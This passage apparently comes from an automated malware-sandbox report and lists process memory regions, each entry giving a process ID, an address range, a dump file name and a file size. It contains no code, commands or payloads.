                                                                                                                      • memory/2448-215-0x000001ACC4B40000-0x000001ACC4BB1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2476-213-0x000002CF88170000-0x000002CF881E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2676-226-0x000001EE98270000-0x000001EE982E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2688-227-0x000001DEE71D0000-0x000001DEE7241000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2716-141-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2744-117-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2744-157-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/2744-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        572KB

                                                                                                                      • memory/2744-159-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/2744-161-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/2744-156-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/2744-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                      • memory/2744-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        152KB

                                                                                                                      • memory/2744-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                      • memory/2808-207-0x0000017902600000-0x0000017902671000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2876-559-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3052-264-0x0000000000FA0000-0x0000000000FB5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        84KB

                                                                                                                      • memory/3052-398-0x0000000002F60000-0x0000000002F76000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        88KB

                                                                                                                      • memory/3288-146-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3332-148-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3336-142-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3480-147-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3556-605-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3572-330-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                      • memory/3572-350-0x0000000005520000-0x0000000005B26000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/3572-333-0x0000000000418826-mapping.dmp
                                                                                                                      • memory/3792-203-0x0000020BFEC60000-0x0000020BFECAC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        304KB

                                                                                                                      • memory/3792-205-0x0000020BFED20000-0x0000020BFED91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/3844-158-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3972-169-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4020-143-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4052-149-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4148-464-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4232-665-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4280-266-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4280-329-0x0000000002320000-0x000000000246A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/4312-426-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4356-597-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4392-554-0x0000000006C10000-0x0000000006C11000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4392-544-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4420-489-0x000000000044003F-mapping.dmp
                                                                                                                      • memory/4420-501-0x0000000000400000-0x0000000000495000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        596KB

                                                                                                                      • memory/4580-363-0x0000000005460000-0x0000000005A66000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/4580-351-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                      • memory/4580-352-0x0000000000418852-mapping.dmp
                                                                                                                      • memory/4584-341-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4828-232-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4828-294-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4828-284-0x0000000000610000-0x0000000000611000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4840-270-0x0000000000480000-0x0000000000481000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4840-283-0x0000000004D90000-0x0000000004D91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4840-233-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4856-286-0x0000000004F30000-0x0000000004FCC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        624KB

                                                                                                                      • memory/4856-234-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4856-273-0x00000000007E0000-0x00000000007E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4856-279-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4856-281-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4868-235-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4876-280-0x0000000000E50000-0x0000000000E51000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4876-290-0x0000000005620000-0x0000000005621000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4876-303-0x0000000005CB0000-0x0000000005CB1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4876-236-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4876-298-0x0000000005600000-0x0000000005676000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        472KB

                                                                                                                      • memory/4884-308-0x00007FF78BA54060-mapping.dmp
                                                                                                                      • memory/4884-427-0x000001E74F000000-0x000001E74F106000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/4884-424-0x000001E74E020000-0x000001E74E03B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        108KB

                                                                                                                      • memory/4884-319-0x000001E74C510000-0x000001E74C55E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        312KB

                                                                                                                      • memory/4884-324-0x000001E74C7D0000-0x000001E74C844000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/4892-237-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4892-291-0x0000000000EB0000-0x0000000000ED3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        140KB

                                                                                                                      • memory/4892-292-0x000000001B630000-0x000000001B632000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4892-269-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4892-285-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4892-296-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4904-238-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4904-362-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/4916-239-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4924-327-0x00000215883A0000-0x000002158840F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        444KB

                                                                                                                      • memory/4924-331-0x0000021588410000-0x00000215884DF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        828KB

                                                                                                                      • memory/4924-243-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4932-325-0x0000000005430000-0x0000000005431000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4932-300-0x0000000076F20000-0x00000000770AE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/4932-305-0x00000000010D0000-0x00000000010D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4932-241-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4940-242-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4940-321-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-312-0x00000000056C0000-0x00000000056C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-342-0x0000000005920000-0x0000000005921000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-315-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-297-0x0000000076F20000-0x00000000770AE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/4940-322-0x00000000056F0000-0x00000000056F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-301-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4940-309-0x0000000005D60000-0x0000000005D61000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4948-240-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4948-346-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4948-295-0x0000000076F20000-0x00000000770AE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.6MB

                                                                                                                      • memory/4948-317-0x0000000000B00000-0x0000000000B01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4960-576-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4976-244-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4988-323-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5028-467-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5028-524-0x0000000007143000-0x0000000007144000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5028-474-0x0000000007140000-0x0000000007141000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5028-475-0x0000000007142000-0x0000000007143000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5056-255-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5360-361-0x0000000000402E1A-mapping.dmp
                                                                                                                      • memory/5360-364-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                      • memory/5408-473-0x0000000007243000-0x0000000007244000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5408-366-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5408-372-0x0000000007240000-0x0000000007241000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5408-379-0x0000000007242000-0x0000000007243000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5544-664-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5664-663-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5704-383-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5768-386-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5784-661-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5808-526-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5808-527-0x0000000004C22000-0x0000000004C23000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5808-553-0x0000000004C23000-0x0000000004C24000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5808-516-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5852-389-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5924-594-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5948-512-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5988-404-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5988-423-0x0000000005330000-0x000000000582E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        5.0MB

                                                                                                                      • memory/6048-442-0x00000000055E0000-0x0000000005BE6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/6048-412-0x0000000000418832-mapping.dmp